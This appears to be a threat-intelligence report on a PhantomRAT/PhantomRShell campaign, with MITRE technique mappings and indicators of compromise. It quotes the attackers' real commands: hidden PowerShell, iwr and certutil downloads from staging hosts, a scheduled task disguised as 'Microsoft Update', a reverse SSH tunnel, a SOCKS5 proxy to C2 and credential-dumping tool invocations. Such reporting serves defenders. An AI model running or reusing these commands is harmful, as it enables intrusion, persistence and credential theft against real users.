Threat actors use PhantomRAT/PhantomRShell and related tools to download and execute remote-access and credential-stealing tools (MeshAgent, OpenSSH, RSocx, PhantomStealer, XenArmor) from multiple staging servers and compromised sites, then persist via scheduled Windows tasks and reverse SSH or SOCKS5 tunnels. Infrastructure includes many domains and IPs such as 188.127.254.234, 195.133.32.213, and mgfoms.org. #PhantomRAT #MeshAgent
Keypoints
- Operators deploy MeshAgent, RSocx, PhantomTaskShell, PhantomStealer, and XenArmor by downloading archives from payload staging servers or compromised/phishing sites and extracting them on target hosts.
- Persistence is achieved by creating scheduled Windows Task Scheduler entries (e.g., “Microsoft Update”, “Yandex Update”, “SSH”, “DNS”) to run malicious binaries or OpenSSH tunnels daily at set times.
- Remote access is maintained via reverse SSH tunnels using OpenSSH (ports 80/443) and SOCKS5 connections to C2 servers (examples: 195.133.32.213, 185.130.251.227, 193.187.174.251).
- Credential access is performed with XenArmor All-In-One Password Recovery Pro and PhantomStealer to harvest stored browser and system credentials, saving results to files before removing tools.
- Multiple delivery methods include direct VPS downloads (http/https), compromised legitimate sites, and phishing pages (fake CAPTCHA) to host payloads like inetpub.zip, dnsclient.zip, remote.zip, hosts.zip, update.zip, browser.zip.
- Command examples show use of PowerShell (Invoke-WebRequest, Expand-Archive, Start-Process), certutil, msiexec for OpenSSH installation, and schtasks for persistence.
- Infrastructure comprises several domains and numerous IP addresses used for staging and C2, indicating a distributed multi-server setup to host and control tools.
MITRE Techniques
- [T1059 ] Command and Scripting Interpreter – Used extensively with PowerShell and cmd to download and run payloads: “powershell -WindowStyle Hidden -Command “& {iwr ‘https://mgfoms.org/in.php?action=2’ -OutFile ‘%userprofile%dnsclient.exe’; Start-Process ‘%userprofile%dnsclient.exe’ -ArgumentList ‘run’ -WindowStyle Hidden}”
- [T1105 ] Ingress Tool Transfer – Downloading payloads from staging servers and compromised sites with iwr/certutil/msiexec: “iwr -Uri ‘http://188.127.254.234:443/remote.zip’ -OutFile ‘C:ProgramDataremote.zip’”; “certutil.exe -urlcache -f http://188.127.254.234:80/remote.zip C:ProgramDataremote.zip”
- [T1053 ] Scheduled Task/Job – Creating Windows scheduled tasks for persistence to run backdoors and tunnels daily: “schtasks /create /sc DAILY /tn “Microsoft Update” /tr “C:ProgramDataYandexClouddnsclient.bat” /st 10:00″
- [T1219 ] Remote Services – Use of OpenSSH to create reverse SSH tunnels to external servers on ports 80/443: “ssh -o StrictHostKeyChecking=no … -f -N -R 37124 -p 80 [email protected]”
- [T1090 ] Proxy – Use of RSocx to establish SOCKS5 proxy connections to C2 servers over ports 443 or 8080: “C:ProgramDatahosts.exe -r 193.187.174.251:443”
- [T1056 ] Input Capture (credential dumping via tools) – Use of XenArmor and PhantomStealer to extract stored credentials and write to files: “C:ProgramDataXenAllPasswordPro.exe -a C:ProgramData.html”; “C:ProgramDatabrowser.exe chrome -c”
- [T1106 ] Native API – Use of msiexec to install OpenSSH client from official GitHub releases: “msiexec /qn /i https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.8.3.0p2-Preview/OpenSSH-Win64-v9.8.3.0.msi”
Indicators of Compromise
- [Domain ] payload staging and phishing hosts – mgfoms.org, austolns.pw (and softline-solutions.cloud)
- [IP ] C2 and staging servers – 188.127.254.234 (staging/download host), 195.133.32.213 (SSH C2), 185.130.251.227 (SSH C2)
- [File name ] delivered payload/archive names – remote.zip, dnsclient.zip, inetpub.zip, update.zip, hosts.zip, browser.zip
- [Tool/Executable ] installed or executed binaries – dnsclient.exe, inetpub.exe, hosts.exe, browser.exe, XenAllPasswordPro.exe
- [URL ] example download endpoints – http://188.127.254.234:443/remote.zip, https://mgfoms.org/in.php?action=2 (and other hosted paths)